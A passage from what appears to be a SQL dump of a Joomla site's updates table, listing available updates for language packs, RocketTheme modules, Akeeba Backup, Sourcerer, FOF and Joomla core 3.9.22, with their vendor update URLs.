Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(24424,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(24425,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(24426,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(24427,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(24428,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(24429,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(24430,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(24431,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(24432,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(24433,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(24434,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(24435,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(24436,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(24437,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(24438,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(24439,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(24440,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(24441,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(24442,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(24443,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(24444,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(24445,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(24446,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(24447,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(24448,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(24449,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(24450,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(24451,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(24452,57,0,'French','','pkg_fr-FR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(24453,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(24454,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(24455,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(24456,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(24457,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(24458,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(24459,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(24460,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.22.2','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(24461,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(24462,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(24463,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(24464,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(24465,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(24466,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(24467,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(24468,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(24469,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(24470,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(24471,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(24472,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(24473,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(24474,57,0,'English US','','pkg_en-US','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(24475,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(24476,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(24477,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(24478,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(24479,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(24480,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(24481,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(24482,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(24483,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(24484,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(24485,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(24486,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(24487,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(24488,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(24489,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(24490,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(24491,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(24492,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(24493,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(24494,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(24495,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(24496,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(24497,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(24498,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(24499,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-2-1.html',''),(24500,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.1.0','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeeba.com/download/fef/1-1-0.html',''),(24501,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.2FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(24502,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.6.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-2.html',''),(24503,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(24504,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(24505,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(24506,3,0,'French','','pkg_fr-FR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(24507,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(24508,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(24509,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(24510,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(24511,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(24512,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(24513,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(24514,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.22.2','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(24515,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(24516,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(24517,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(24518,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(24519,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(24520,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(24521,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(24522,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(24523,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(24524,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(24525,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(24526,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(24527,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(24528,3,0,'English US','','pkg_en-US','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(24529,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(24530,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(24531,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(24532,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(24533,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(24534,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(24535,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(24536,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(24537,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(24538,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(24539,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(24540,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(24541,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(24542,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(24543,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(24544,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(24545,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(24546,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(24547,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(24548,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(24549,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(24550,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(24551,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(24552,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(24553,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(24554,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(24555,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(24556,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(24557,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(24558,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(24559,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(24560,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(24561,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(24562,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(24563,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(24564,57,0,'French','','pkg_fr-FR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(24565,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(24566,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(24567,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(24568,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(24569,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(24570,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(24571,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(24572,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.22.2','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(24573,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(24574,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(24575,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(24576,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(24577,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(24578,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(24579,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(24580,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(24581,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(24582,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(24583,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(24584,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(24585,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(24586,57,0,'English US','','pkg_en-US','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(24587,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(24588,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(24589,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(24590,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(24591,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(24592,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(24593,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(24594,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(24595,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(24596,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(24597,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(24598,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(24599,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(24600,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(24601,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(24602,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(24603,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(24604,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(24605,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(24606,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(24607,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(24608,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(24609,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(24610,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(24611,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-2-1.html',''),(24612,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.1.0','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeeba.com/download/fef/1-1-0.html',''),(24613,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.2FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(24614,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.6.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-2.html',''),(24615,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(24616,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(24617,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(24618,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(24619,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-2-1.html',''),(24620,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(24621,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(24622,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(24623,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(24624,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-2-1.html',''),(24625,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(24626,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(24627,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(24628,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(24629,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-2-1.html',''),(24630,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(24631,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(24632,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(24633,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(24634,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(24635,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(24636,3,0,'French','','pkg_fr-FR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(24637,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(24638,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.22.1','','https://updat